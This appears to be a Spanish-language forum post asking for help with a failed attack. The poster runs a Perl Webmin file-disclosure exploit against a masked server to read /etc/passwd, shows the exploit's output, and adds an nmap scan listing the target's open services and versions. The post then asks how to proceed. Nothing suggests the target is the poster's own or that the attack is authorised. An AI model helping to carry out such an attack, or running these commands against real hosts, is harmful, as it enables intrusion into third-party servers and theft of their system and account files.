Autor
Código:
[nube@GNU webmin]$ perl 2017.pl https://server.xxxxxxx.xxxx 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking https://server.xxxxxxxxx.xxxx on port 10000!
FILENAME: /etc/passwd
Failed: 500 Can't connect to https::443 (Bad hostname 'https:')
nmap quick scan plus
Código:
Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-06 00:10 ART
Nmap scan report for www.xxxxxxxxxxx.xxx (2**.45.xx.**)
Host is up (0.32s latency).
rDNS record for 2**.45.**: server.xxxxxxxxxx.xxxx
Not shown: 92 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp closed ssh
53/tcp open domain ISC BIND 9.5.0-P1
80/tcp open http Apache httpd 2.2.8 ((Fedora))
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
873/tcp closed rsync
10000/tcp open http MiniServ 0.01 (Webmin httpd)
Device type: general purpose|firewall|proxy server|WAP
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (93%), ISS Linux 2.4.X (92%), Cisco Linux 2.6.X (88%), Riverbed embedded (88%), AVM embedded (87%), Netgear embedded (87%), Linksys embedded (87%)
Aggressive OS guesses: Blue Coat Director (Linux 2.6.10) (93%), Linux 2.6.18 (93%), Linux 2.6.5 (93%), Linux 2.6.9 - 2.6.27 (92%), ISS Proventia GX3002 firewall (Linux 2.4.18) (92%), Linux 2.6.9 (89%), Linux 2.4.20 (88%), Linux 2.6.18 - 2.6.28 (88%), Linux 2.6.24 (88%), Linux 2.6.29 (88%)
No exact OS matches for host (test conditions non-ideal).
Y no sé como demonios avanzar.
Ya instalé las librerías perl-crypt-ssleay y perl-net-ssleay y no sé que me puede estar faltando.
Desde ya agradezco cualquier ayuda.
En línea
